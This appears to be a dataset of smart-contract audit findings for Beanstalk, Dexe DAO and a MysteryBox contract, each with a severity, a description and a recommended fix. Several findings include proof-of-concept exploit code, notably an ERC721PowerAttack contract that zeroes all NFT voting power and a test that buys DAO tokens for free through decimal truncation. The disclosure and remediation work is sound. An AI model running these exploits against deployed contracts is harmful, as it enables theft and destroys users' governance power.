The mixing of decimals between the old milestone stem (truncated) and the new milestone stem (untruncated, after the first `gm` call following the BIP-39 upgrade) breaks the existing grown stalk accounting, resulting in a loss of grown stalk for depositors.\\nProof of Concept: The previous implementation returns the cumulative stalk per BDV with 4 decimals:\\n```\\n function stemTipForToken(address token)\\n internal\\n view\\n returns (int96 _stemTipForToken)\\n {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n\\n // SafeCast unnecessary because all casted variables are types smaller that int96.\\n _stemTipForToken = s.ss[token].milestoneStem +\\n int96(s.ss[token].stalkEarnedPerSeason).mul(\\n int96(s.season.current).sub(int96(s.ss[token].milestoneSeason))\\n ).div(1e6); //round here\\n }\\n```\\n\\nWhich can be mathematically abstracted to: $$StemTip(token) = getMilestoneStem(token) + (currentSeason - getMilestoneStemSeason(token)) \\times \\frac{stalkEarnedPerSeason(token)}{10^{6}}$$\\nThis division by $10^{6}$ happens because the stem tip previously had just 4 decimals. This division allows backward compatibility by not considering the final 6 decimals. Therefore, the stem tip MUST ALWAYS have 4 decimals.\\nThe milestone stem is now updated in each `gm` call so long as all LP price oracles pass their respective checks. Notably, the milestone stem is now stored with 10 decimals (untruncated), which is why the second term of the abstraction omits the $10^{6}$ division in `LibTokenSilo::stemTipForTokenUntruncated`.\\nHowever, if the existing milestone stem is not scaled up by $10^{6}$, the addition performed during the upgrade and in subsequent `gm` calls makes no sense. This must be handled within the upgrade, otherwise every part of the protocol which calls `LibTokenSilo.stemTipForToken` will receive an incorrect value, except for BEAN:ETH Well LP (given it was created after the Silo v3 upgrade).\\nSome instances where this function is used include:\\n`EnrootFacet::enrootDeposit`\\n`EnrootFacet::enrootDeposits`\\n`MetaFacet::uri`\\n`ConvertFacet::_withdrawTokens`\\n`LibSilo::__mow`\\n`LibSilo::_removeDepositFromAccount`\\n`LibSilo::_removeDepositsFromAccount`\\n`Silo::_plant`\\n`TokenSilo::_deposit`\\n`TokenSilo::_transferDeposits`\\n`LibLegacyTokenSilo::_mowAndMigrate`\\n`LibTokenSilo::_mowAndMigrate`\\nAs can be observed, critical parts of the protocol are compromised, leading to further cascading issues.
```\\n_stemTipForToken = s.ss[token].milestoneStem +\\n int96(s.ss[token].stalkEarnedPerSeason).mul(\\n int96(s.season.current).sub(int96(s.ss[token].milestoneSeason))\\n );\\n```\\n
Both reserves should be checked in `LibWell::getWellPriceFromTwaReserves`
low
```\\nfunction getWellPriceFromTwaReserves(address well) internal view returns (uint256 price) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n // s.twaReserve[well] should be set prior to this function being called.\\n // 'price' is in terms of reserve0:reserve1.\\n if (s.twaReserves[well].reserve0 == 0) {\\n price = 0;\\n } else {\\n price = s.twaReserves[well].reserve0.mul(1e18).div(s.twaReserves[well].reserve1);\\n }\\n}\\n```\\n\\nCurrently, `LibWell::getWellPriceFromTwaReserves` sets the price to zero if the time-weighted average value of the zeroth reserve (for Wells, Bean) is zero. Given the implementation of `LibWell::setTwaReservesForWell`, and that a Pump failure will return an empty reserves array, it does not appear possible to encounter the case where one reserve can be zero without the other except for perhaps an exploit or migration scenario. Therefore, whilst unlikely, it is best to ensure both reserves are non-zero to avoid a potential division by zero on `reserve1` when calculating the price, as a revert here would result in DoS of `SeasonFacet::gm`.\\n```\\nfunction setTwaReservesForWell(address well, uint256[] memory twaReserves) internal {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n // if the length of twaReserves is 0, then return 0.\\n // the length of twaReserves should never be 1, but\\n // is added for safety.\\n if (twaReserves.length < 1) {\\n delete s.twaReserves[well].reserve0;\\n delete s.twaReserves[well].reserve1;\\n } else {\\n // safeCast not needed as the reserves are uint128 in the wells.\\n s.twaReserves[well].reserve0 = uint128(twaReserves[0]);\\n s.twaReserves[well].reserve1 = uint128(twaReserves[1]);\\n }\\n}\\n```\\n\\nAdditionally, to correctly implement the check identified by the comment in `LibWell::setTwaReservesForWell`, the time-weighted average reserves in storage should be reset if the array length is less than or equal to 1.
```\\n// LibWell::getWellPriceFromTwaReserves`\\n// Remove the line below\\n if (s.twaReserves[well].reserve0 == 0) {\\n// Add the line below\\n if (s.twaReserves[well].reserve0 == 0 || s.twaReserves[well].reserve1 == 0) {\\n price = 0;\\n} else {\\n\\n// LibWell::setTwaReservesForWell\\n// Remove the line below\\n if (twaReserves.length < 1) {\\n// Add the line below\\n if (twaReserves.length <= 1) {\\n delete s.twaReserves[well].reserve0;\\n delete s.twaReserves[well].reserve1;\\n} else {\\n```\\n
null
```\\nfunction getWellPriceFromTwaReserves(address well) internal view returns (uint256 price) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n // s.twaReserve[well] should be set prior to this function being called.\\n // 'price' is in terms of reserve0:reserve1.\\n if (s.twaReserves[well].reserve0 == 0) {\\n price = 0;\\n } else {\\n price = s.twaReserves[well].reserve0.mul(1e18).div(s.twaReserves[well].reserve1);\\n }\\n}\\n```\\n
Small unripe token withdrawals don't decrease BDV and Stalk
low
For any whitelisted token where `bdvCalc(amountDeposited) < amountDeposited`, a user can deposit that token and then withdraw in small amounts to avoid decreasing BDV and Stalk. This is achieved by exploiting a rounding down to zero precision loss in LibTokenSilo::removeDepositFromAccount:\\n```\\n// @audit small unripe bean withdrawals don't decrease BDV and Stalk\\n// due to rounding down to zero precision loss. Every token where\\n// `bdvCalc(amountDeposited) < amountDeposited` is vulnerable\\nuint256 removedBDV = amount.mul(crateBDV).div(crateAmount);\\n```\\n
`LibTokenSilo::removeDepositFromAccount` should revert if `removedBDV == 0`. A similar check already exists in `LibTokenSilo::depositWithBDV` but is missing in `removeDepositFromAccount()` when calculating `removedBDV` for partial withdrawals.\\nThe breaking of protocol invariants could lead to other serious issues that have not yet been identified but may well exist if core properties do not hold. We would urge the team to consider fixing this bug as soon as possible, prior to or as part of the BIP-39 upgrade.
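A sketch of the check, mirroring the existing validation in `depositWithBDV` (the revert message is illustrative):\\n```\\nuint256 removedBDV = amount.mul(crateBDV).div(crateAmount);\\nrequire(removedBDV > 0, "Silo: removed BDV must be > 0.");\\n```\\n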
An attacker can withdraw deposited assets without decreasing BDV and Stalk. While the cost to perform this attack is likely more than the value an attacker would stand to gain, the potential impact should definitely be explored more closely, especially considering the introduction of the Unripe Chop Convert in BIP-39, as this could have other unintended consequences in relation to this bug (given that the inflated BDV of an Unripe Token will persist once the deposit is converted to its ripe counterpart, potentially allowing value to be extracted that way depending on how this BDV is used/manipulated elsewhere).\\nThe other primary consideration for this bug is that it breaks the mechanism whereby Stalk is supposed to be lost when withdrawing deposited assets, and keeps the `totalDepositedBdv` artificially high, violating the invariant that the `totalDepositedBdv` value for a token should be the sum of the BDV value of all the individual deposits.\\nProof of Concept: Add this PoC to `SiloToken.test.js` under the section describe("1 deposit, some", async function () {:\\n```\\nit('audit small unripe bean withdrawals dont decrease BDV and Stalks', async function () {\\n let initialUnripeBeanDeposited = to6('10');\\n let initialUnripeBeanDepositedBdv = '2355646';\\n let initialTotalStalk = pruneToStalk(initialUnripeBeanDeposited).add(toStalk('0.5'));\\n\\n // verify initial state\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq(initialUnripeBeanDeposited);\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq(initialUnripeBeanDepositedBdv);\\n expect(await this.silo.totalStalk()).to.eq(initialTotalStalk);\\n\\n // snapshot EVM state as we want to restore it after testing the normal\\n // case works as expected\\n let snapshotId = await network.provider.send('evm_snapshot');\\n\\n // normal case: withdrawing total UNRIPE_BEAN correctly decreases BDV & removes stalks\\n const stem = await this.silo.seasonToStem(UNRIPE_BEAN, '10');\\n await this.silo.connect(user).withdrawDeposit(UNRIPE_BEAN, stem, initialUnripeBeanDeposited, EXTERNAL);\\n\\n // verify UNRIPE_BEAN totalDeposited == 0\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq('0');\\n // verify UNRIPE_BEAN totalDepositedBDV == 0\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq('0');\\n // verify silo.totalStalk() == 0\\n expect(await this.silo.totalStalk()).to.eq('0');\\n\\n // restore EVM state to snapshot prior to testing normal case\\n await network.provider.send("evm_revert", [snapshotId]);\\n\\n // re-verify initial state\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq(initialUnripeBeanDeposited);\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq(initialUnripeBeanDepositedBdv);\\n expect(await this.silo.totalStalk()).to.eq(initialTotalStalk);\\n\\n // attacker case: withdrawing small amounts of UNRIPE_BEAN doesn't decrease\\n // BDV and doesn't remove stalks. This lets an attacker withdraw their deposits\\n // without losing Stalks & breaks the invariant that the totalDepositedBDV should\\n // equal the sum of the BDV of all individual deposits\\n let smallWithdrawAmount = '4';\\n await this.silo.connect(user).withdrawDeposit(UNRIPE_BEAN, stem, smallWithdrawAmount, EXTERNAL);\\n\\n // verify UNRIPE_BEAN totalDeposited has been correctly decreased\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq(initialUnripeBeanDeposited.sub(smallWithdrawAmount));\\n // verify UNRIPE_BEAN totalDepositedBDV remains unchanged!\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq(initialUnripeBeanDepositedBdv);\\n // verify silo.totalStalk() remains unchanged!\\n expect(await this.silo.totalStalk()).to.eq(initialTotalStalk);\\n});\\n```\\n\\nRun with: `npx hardhat test --grep "audit small unripe bean withdrawals dont decrease BDV and Stalks"`.\\nAdditional Mainnet fork tests have been written to demonstrate the presence of this bug in the current and post-BIP-39 deployments of Beanstalk (see Appendix B).
```\\n// @audit small unripe bean withdrawals don't decrease BDV and Stalk\\n// due to rounding down to zero precision loss. Every token where\\n// `bdvCalc(amountDeposited) < amountDeposited` is vulnerable\\nuint256 removedBDV = amount.mul(crateBDV).div(crateAmount);\\n```\\n
Broken check in `MysteryBox::fulfillRandomWords()` fails to prevent same request being fulfilled multiple times
high
Consider the check which attempts to prevent the same request from being fulfilled multiple times:\\n```\\nif (vrfRequests[_requestId].fulfilled) revert InvalidVrfState();\\n```\\n\\nThe problem is that `vrfRequests[_requestId].fulfilled` is never set to `true` anywhere and `vrfRequests[_requestId]` is deleted at the end of the function.
Set `vrfRequests[_requestId].fulfilled = true`.\\nConsider an optimized version which involves having 2 mappings `activeVrfRequests` and fulfilledVrfRequests:\\nrevert `if(fulfilledVrfRequests[_requestId])`\\nelse set `fulfilledVrfRequests[_requestId] = true`\\nfetch the matching active request into memory from `activeVrfRequests[_requestId]` and continue processing as normal\\nat the end `delete activeVrfRequests[_requestId]`\\nThis only stores forever the `requestId` : `bool` pair in `fulfilledVrfRequests`.\\nConsider a similar approach in `MysteryBox::fulfillBoxAmount()`.
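A sketch of the optimized two-mapping variant, assuming Chainlink VRF v2's callback signature and an illustrative `VrfRequest` struct:\\n```\\nmapping(uint256 => VrfRequest) private activeVrfRequests;\\nmapping(uint256 => bool) private fulfilledVrfRequests;\\n\\nfunction fulfillRandomWords(uint256 _requestId, uint256[] memory _randomWords) internal override {\\n // permanently record fulfilment so the same request can never be fulfilled twice\\n if (fulfilledVrfRequests[_requestId]) revert InvalidVrfState();\\n fulfilledVrfRequests[_requestId] = true;\\n\\n VrfRequest memory request = activeVrfRequests[_requestId];\\n /* snip: existing fulfilment logic using `request` and `_randomWords` */\\n\\n // only the bulky struct is deleted; the small bool stays forever\\n delete activeVrfRequests[_requestId];\\n}\\n```\\n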
The same request can be fulfilled multiple times which would override the previous randomly generated seed; a malicious provider who was also a mystery box minter could generate new randomness until they got a rare mystery box.
```\\nif (vrfRequests[_requestId].fulfilled) revert InvalidVrfState();\\n```\\n
Use low level `call()` to prevent gas griefing attacks when returned data not required
low
Using `call()` when the returned data is not required unnecessarily exposes the contract to gas griefing attacks via a huge returned data payload. For example:\\n```\\n(bool sent, ) = address(operatorAddress).call{value: msg.value}("");\\nif (!sent) revert Unauthorized();\\n```\\n\\nIs the same as writing:\\n```\\n(bool sent, bytes memory data) = address(operatorAddress).call{value: msg.value}("");\\nif (!sent) revert Unauthorized();\\n```\\n\\nIn both cases the returned data will have to be copied into memory, exposing the contract to gas griefing attacks, even though the returned data is not required at all.
Use a low-level call when the returned data is not required, eg:\\n```\\nbool sent;\\nassembly {\\n sent := call(gas(), receiver, amount, 0, 0, 0, 0)\\n}\\nif (!sent) revert Unauthorized();\\n```\\n\\nConsider using ExcessivelySafeCall.
Contracts unnecessarily expose themselves to gas griefing attacks.
```\\n(bool sent, ) = address(operatorAddress).call{value: msg.value}("");\\nif (!sent) revert Unauthorized();\\n```\\n
`TokenSaleProposal::buy` implicitly assumes that buy token has 18 decimals resulting in a potential total loss scenario for Dao Pool
high
`TokenSaleProposalBuy::buy` is called by users looking to buy the DAO token using a pre-approved token. The exchange rate for this sale is pre-assigned for the specific tier. This function internally calls `TokenSaleProposalBuy::_purchaseWithCommission` to transfer funds from the buyer to the gov pool. Part of the transferred funds are used to pay the DexeDAO commission and balance funds are transferred to the `GovPool` address. To do this, `TokenSaleProposalBuy::_sendFunds` is called.\\n```\\n function _sendFunds(address token, address to, uint256 amount) internal {\\n if (token == ETHEREUM_ADDRESS) {\\n (bool success, ) = to.call{value: amount}("");\\n require(success, "TSP: failed to transfer ether");\\n } else {\\n IERC20(token).safeTransferFrom(msg.sender, to, amount.from18(token.decimals())); //@audit -> amount is assumed to be 18 decimals\\n }\\n }\\n```\\n\\nNote that this function assumes that the `amount` of ERC20 token is always 18 decimals. The `DecimalsConverter::from18` function converts from a base decimal (18) to token decimals. Note that the `amount` is directly passed by the buyer and there is no prior normalisation done to ensure the token decimals are converted to 18 decimals before the `_sendFunds` is called.
There are at least 2 options for mitigating this issue:\\nOption 1 - revise the design decision that all token amounts must be sent in 18 decimals even if the underlying token decimals are not 18, to instead that all token amounts should be sent in their native decimals and Dexe will convert everything.\\nOption 2 - keep current design but revert if `amount.from18(token.decimals()) == 0` in L90 or alternatively use the `from18Safe()` function which uses `_convertSafe()` that reverts if the conversion is 0.\\nThe project team should also examine other areas where the same pattern occurs which may have the same vulnerability and where it may be required to revert if the conversion returns 0:\\n`GovUserKeeper` L92, L116, L183\\n`GovPool` L248\\n`TokenSaleProposalWhitelist` L50\\n`ERC721Power` L113, L139\\n`TokenBalance` L35, L62
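A sketch of Option 2 applied to `_sendFunds`, keeping the 18-decimal input convention but reverting when the conversion truncates to zero (the revert message is illustrative; using the existing `from18Safe()` achieves the same effect):\\n```\\nfunction _sendFunds(address token, address to, uint256 amount) internal {\\n if (token == ETHEREUM_ADDRESS) {\\n (bool success, ) = to.call{value: amount}("");\\n require(success, "TSP: failed to transfer ether");\\n } else {\\n uint256 converted = amount.from18(token.decimals());\\n require(converted != 0, "TSP: zero transfer amount");\\n IERC20(token).safeTransferFrom(msg.sender, to, converted);\\n }\\n}\\n```\\n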
It is easy to see that tokens with smaller decimals, e.g. USDC with 6 decimals, will cause a total loss to the DAO. In such cases the amount is presumed to be in 18 decimals and, on converting to token decimals (6), can round down to 0.\\nProof of Concept:\\nTier 1 allows users to buy the DAO token at an exchange rate of 1 DAO token = 1 USDC.\\nUser intends to buy 1000 DAO tokens and calls `TokenSaleProposal::buy` with `buy(1, USDC, 1000*10**6)`\\nDexe DAO commission is assumed to be 0% for simplicity -> `_sendFunds` is called with `_sendFunds(USDC, govPool, 1000*10**6)`\\n`DecimalConverter::from18` function is called on amount with base decimals 18, destination decimals 6: `from18(1000*10**6, 18, 6)`\\nthis gives `1000*10**6 / 10**(18-6) = 1000 / 10**6`, which rounds down to 0\\nBuyer can claim 1000 DAO tokens for free. This is a total loss to the DAO.\\nAdd PoC to TokenSaleProposal.test.js:\\nFirst add a new line around L76 to add new purchaseToken3:\\n```\\n let purchaseToken3;\\n```\\n\\nThen add a new line around L528:\\n```\\n purchaseToken3 = await ERC20Mock.new("PurchaseMockedToken3", "PMT3", 6);\\n```\\n\\nThen add a new tier around L712:\\n```\\n {\\n metadata: {\\n name: "tier 9",\\n description: "the ninth tier",\\n },\\n totalTokenProvided: wei(1000),\\n saleStartTime: timeNow.toString(),\\n saleEndTime: (timeNow + 10000).toString(),\\n claimLockDuration: "0",\\n saleTokenAddress: saleToken.address,\\n purchaseTokenAddresses: [purchaseToken3.address],\\n exchangeRates: [PRECISION.times(1).toFixed()],\\n minAllocationPerUser: 0,\\n maxAllocationPerUser: 0,\\n vestingSettings: {\\n vestingPercentage: "0",\\n vestingDuration: "0",\\n cliffPeriod: "0",\\n unlockStep: "0",\\n },\\n participationDetails: [],\\n },\\n```\\n\\nThen add the test itself under the section describe("if added to whitelist", () => {:\\n```\\n it("audit buy implicitly assumes that buy token has 18 decimals resulting in loss to DAO", async () => {\\n await purchaseToken3.approve(tsp.address, wei(1000));\\n\\n // tier9 has the following parameters:\\n // totalTokenProvided : wei(1000)\\n // minAllocationPerUser : 0 (no min)\\n // maxAllocationPerUser : 0 (no max)\\n // exchangeRate : 1 sale token for every 1 purchaseToken\\n //\\n // purchaseToken3 has 6 decimal places\\n //\\n // mint purchase tokens to owner 1000 in 6 decimal places\\n // 1000 000000\\n let buyerInitTokens6Dec = 1000000000;\\n\\n await purchaseToken3.mint(OWNER, buyerInitTokens6Dec);\\n await purchaseToken3.approve(tsp.address, buyerInitTokens6Dec, { from: OWNER });\\n\\n //\\n // start: buyer has bought no tokens\\n let TIER9 = 9;\\n let purchaseView = userViewsToObjects(await tsp.getUserViews(OWNER, [TIER9]))[0].purchaseView;\\n assert.equal(purchaseView.claimTotalAmount, wei(0));\\n\\n // buyer attempts to purchase using 100 purchaseToken3 tokens\\n // purchaseToken3 has 6 decimals but all inputs to Dexe should be in\\n // 18 decimals, so buyer formats input amount to 18 decimals\\n // doing this first to verify it works correctly\\n let buyInput18Dec = wei("100");\\n await tsp.buy(TIER9, purchaseToken3.address, buyInput18Dec);\\n\\n // buyer has bought wei(100) sale tokens\\n purchaseView = userViewsToObjects(await tsp.getUserViews(OWNER, [TIER9]))[0].purchaseView;\\n assert.equal(purchaseView.claimTotalAmount, buyInput18Dec);\\n\\n // buyer has 900 000000 remaining purchaseToken3 tokens\\n assert.equal((await purchaseToken3.balanceOf(OWNER)).toFixed(), "900000000");\\n\\n // next buyer attempts to purchase using 100 purchaseToken3 tokens\\n // but sends input formatted into native 6 decimals\\n // sends 6 decimal input: 100 000000\\n let buyInput6Dec = 100000000;\\n await tsp.buy(TIER9, purchaseToken3.address, buyInput6Dec);\\n\\n // buyer has bought an additional 100000000 sale tokens\\n purchaseView = userViewsToObjects(await tsp.getUserViews(OWNER, [TIER9]))[0].purchaseView;\\n assert.equal(purchaseView.claimTotalAmount, "100000000000100000000");\\n\\n // but the buyer still has 900 000000 remaining purchasetoken3 tokens\\n assert.equal((await purchaseToken3.balanceOf(OWNER)).toFixed(), "900000000");\\n\\n // by sending the input amount formatted to 6 decimal places,\\n // the buyer was able to buy small amounts of the token being sold\\n // for free!\\n });\\n```\\n\\nFinally run the test with: `npx hardhat test --grep "audit buy implicitly assumes that buy token has 18 decimals resulting in loss to DAO"`
```\\n function _sendFunds(address token, address to, uint256 amount) internal {\\n if (token == ETHEREUM_ADDRESS) {\\n (bool success, ) = to.call{value: amount}("");\\n require(success, "TSP: failed to transfer ether");\\n } else {\\n IERC20(token).safeTransferFrom(msg.sender, to, amount.from18(token.decimals())); //@audit -> amount is assumed to be 18 decimals\\n }\\n }\\n```\\n
Attacker can destroy user voting power by setting `ERC721Power::totalPower` and all existing NFTs `currentPower` to 0
high
Attacker can destroy user voting power by setting `ERC721Power::totalPower` & all existing nfts' `currentPower` to 0 via a permission-less attack contract by exploiting a discrepancy ("<" vs "<=") in `ERC721Power` L144 & L172:\\n```\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n // @audit execution allowed to continue when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n // @audit getNftPower() returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since power\\n // calculation has just started, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit totalPower += 0 (newPower = 0 in above line)\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n // @audit will set nft's current power to 0\\n nftInfo.currentPower = newPower;\\n}\\n\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n // @audit execution always returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n```\\n\\nThis attack has to be run on the exact block that power calculation starts (when block.timestamp == ERC721Power.powerCalcStartTimestamp).
Resolve the discrepancy between `ERC721Power` L144 & L172.
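A minimal sketch of the fix, assuming the intent is that both functions treat the exact starting block identically:\\n```\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n    // Use <= (instead of <) so recalculation is a no-op on the exact starting\\n    // block, matching getNftPower(), which returns 0 while\\n    // block.timestamp <= powerCalcStartTimestamp\\n    if (block.timestamp <= powerCalcStartTimestamp) {\\n        return 0;\\n    }\\n    // ... rest of the recalculation logic unchanged ...\\n}\\n```\\n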
`ERC721Power::totalPower` & all existing nfts' `currentPower` are set to 0, negating voting using `ERC721Power` since `totalPower` is read when creating the snapshot and `GovUserKeeper::getNftsPowerInTokensBySnapshot()` will return 0, the same as if the nft contract didn't exist. Can also negatively affect the ability to create proposals.\\nThis attack is extremely devastating as the individual power of `ERC721Power` nfts can never be increased; it can only decrease over time if the required collateral is not deposited. By setting all nfts' `currentPower = 0` as soon as power calculation starts (block.timestamp == ERC721Power.powerCalcStartTimestamp) the `ERC721Power` contract is effectively completely bricked - there is no way to "undo" this attack unless the nft contract is replaced with a new contract.\\nDexe-DAO can be created using only nfts for voting; in this case this exploit which completely bricks the voting power of all nfts means a new DAO has to be re-deployed since no one can vote as everyone's voting power has been destroyed.\\nProof of Concept: Add attack contract mock/utils/ERC721PowerAttack.sol:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.4;\\n\\nimport "../../gov/ERC721/ERC721Power.sol";\\n\\nimport "hardhat/console.sol";\\n\\ncontract ERC721PowerAttack {\\n // this attack can decrease ERC721Power::totalPower by the true max power of all\\n // the power nfts that exist (to zero), regardless of who owns them, and sets the current\\n // power of all nfts to zero, totally bricking the ERC721Power contract.\\n //\\n // this attack only works when block.timestamp == nftPower.powerCalcStartTimestamp\\n // as it takes advantage of a difference in getNftPower() & recalculateNftPower():\\n //\\n // getNftPower() returns 0 when block.timestamp <= powerCalcStartTimestamp\\n // recalculateNftPower returns 0 when block.timestamp < powerCalcStartTimestamp\\n function attack(\\n address nftPowerAddr,\\n uint256 initialTotalPower,\\n uint256 lastTokenId\\n ) external {\\n ERC721Power nftPower = ERC721Power(nftPowerAddr);\\n\\n // verify attack starts on the correct block\\n require(\\n block.timestamp == nftPower.powerCalcStartTimestamp(),\\n "ERC721PowerAttack: attack requires block.timestamp == nftPower.powerCalcStartTimestamp"\\n );\\n\\n // verify totalPower() correct at starting block\\n require(\\n nftPower.totalPower() == initialTotalPower,\\n "ERC721PowerAttack: incorrect initial totalPower"\\n );\\n\\n // call recalculateNftPower() for every nft, this:\\n // 1) decreases ERC721Power::totalPower by that nft's max power\\n // 2) sets that nft's currentPower = 0\\n for (uint256 i = 1; i <= lastTokenId; ) {\\n require(\\n nftPower.recalculateNftPower(i) == 0,\\n "ERC721PowerAttack: recalculateNftPower() should return 0 for new nft power"\\n );\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n require(\\n nftPower.totalPower() == 0,\\n "ERC721PowerAttack: after attack finished totalPower should equal 0"\\n );\\n }\\n}\\n```\\n\\nAdd test harness to ERC721Power.test.js:\\n```\\n describe("audit attacker can manipulate ERC721Power totalPower", () => {\\n it("audit attack 1 sets ERC721Power totalPower & all nft currentPower to 0", async () => {\\n // deploy the ERC721Power nft contract with:\\n // max power of each nft = 100\\n // power reduction 10%\\n // required collateral = 100\\n let maxPowerPerNft = toPercent("100");\\n let requiredCollateral = wei("100");\\n let powerCalcStartTime = (await getCurrentBlockTime()) + 1000;\\n // hack needed to start attack contract on exact 
block due to hardhat\\n // advancing block.timestamp in the background between function calls\\n let powerCalcStartTime2 = (await getCurrentBlockTime()) + 999;\\n\\n // create power nft contract\\n await deployNft(powerCalcStartTime, maxPowerPerNft, toPercent("10"), requiredCollateral);\\n\\n // ERC721Power::totalPower should be zero as no nfts yet created\\n assert.equal((await nft.totalPower()).toFixed(), toPercent("0").times(1).toFixed());\\n\\n // create the attack contract\\n const ERC721PowerAttack = artifacts.require("ERC721PowerAttack");\\n let attackContract = await ERC721PowerAttack.new();\\n\\n // create 10 power nfts for SECOND\\n await nft.safeMint(SECOND, 1);\\n await nft.safeMint(SECOND, 2);\\n await nft.safeMint(SECOND, 3);\\n await nft.safeMint(SECOND, 4);\\n await nft.safeMint(SECOND, 5);\\n await nft.safeMint(SECOND, 6);\\n await nft.safeMint(SECOND, 7);\\n await nft.safeMint(SECOND, 8);\\n await nft.safeMint(SECOND, 9);\\n await nft.safeMint(SECOND, 10);\\n\\n // verify ERC721Power::totalPower has been increased by max power for all nfts\\n assert.equal((await nft.totalPower()).toFixed(), maxPowerPerNft.times(10).toFixed());\\n\\n // fast forward time to the start of power calculation\\n await setTime(powerCalcStartTime2);\\n\\n // launch the attack\\n await attackContract.attack(nft.address, maxPowerPerNft.times(10).toFixed(), 10);\\n });\\n });\\n```\\n\\nRun attack with: `npx hardhat test --grep "audit attack 1 sets ERC721Power totalPower & all nft currentPower to 0"`
```\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n // @audit execution allowed to continue when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n // @audit getNftPower() returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since power\\n // calculation has just started, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit totalPower += 0 (newPower = 0 in above line)\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n // @audit will set nft's current power to 0\\n nftInfo.currentPower = newPower;\\n}\\n\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n // @audit execution always returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n```\\n
A malicious DAO Pool can create a token sale tier without actually transferring any DAO tokens
high
`TokenSaleProposalCreate::createTier` is called by a DAO Pool owner to create a new token sale tier. A fundamental prerequisite for creating a tier is that the DAO Pool owner must transfer the `totalTokenProvided` amount of DAO tokens to the `TokenSaleProposal`.\\nThe current implementation uses a low-level call to transfer tokens from `msg.sender` (GovPool) to the `TokenSaleProposal` contract. However, it fails to validate the token balances after the transfer. We notice a `dev` comment stating "return value is not checked intentionally" - even so, this vulnerability is not about checking the returned `status` but about verifying the contract balances before & after the call.\\n```\\nfunction createTier(\\n mapping(uint256 => ITokenSaleProposal.Tier) storage tiers,\\n uint256 newTierId,\\n ITokenSaleProposal.TierInitParams memory _tierInitParams\\n ) external {\\n\\n // rest of code.\\n /// @dev return value is not checked intentionally\\n > tierInitParams.saleTokenAddress.call(\\n abi.encodeWithSelector(\\n IERC20.transferFrom.selector,\\n msg.sender,\\n address(this),\\n totalTokenProvided\\n )\\n ); //@audit -> no check if the contract balance has increased proportional to the totalTokenProvided\\n }\\n```\\n\\nSince a DAO Pool owner can use any ERC20 as a DAO token, a malicious Gov Pool owner can deploy a custom ERC20 implementation that overrides the standard `transferFrom` logic to fake a successful transfer without actually transferring the underlying tokens.
Calculate the contract balance before and after the low-level call and verify if the account balance increases by `totalTokenProvided`. Please be mindful that this check is only valid for non-fee-on-transfer tokens. For fee-on-transfer tokens, the balance increase needs to be further adjusted for the transfer fees. Example code for non-free-on-transfer-tokens:\\n```\\n // transfer sale tokens to TokenSaleProposal and validate the transfer\\n IERC20 saleToken = IERC20(_tierInitParams.saleTokenAddress);\\n\\n // record balance before transfer in 18 decimals\\n uint256 balanceBefore18 = saleToken.balanceOf(address(this)).to18(_tierInitParams.saleTokenAddress);\\n\\n // perform the transfer\\n saleToken.safeTransferFrom(\\n msg.sender,\\n address(this),\\n _tierInitParams.totalTokenProvided.from18Safe(_tierInitParams.saleTokenAddress)\\n );\\n\\n // record balance after the transfer in 18 decimals\\n uint256 balanceAfter18 = saleToken.balanceOf(address(this)).to18(_tierInitParams.saleTokenAddress);\\n\\n // verify that the transfer has actually occured to protect users from malicious\\n // sale tokens that don't actually send the tokens for the token sale\\n require(balanceAfter18 - balanceBefore18 == _tierInitParams.totalTokenProvided,\\n "TSP: token sale proposal creation received incorrect amount of tokens"\\n );\\n```\\n
A fake tier can be created without the proportionate amount of DAO Pool token balance in the `TokenSaleProposal` contract. Naive users can participate in such a token sale assuming their DAO token claims will be honoured at a future date. Since the pool has insufficient token balance, any attempts to claim the DAO pool tokens can lead to a permanent DOS.
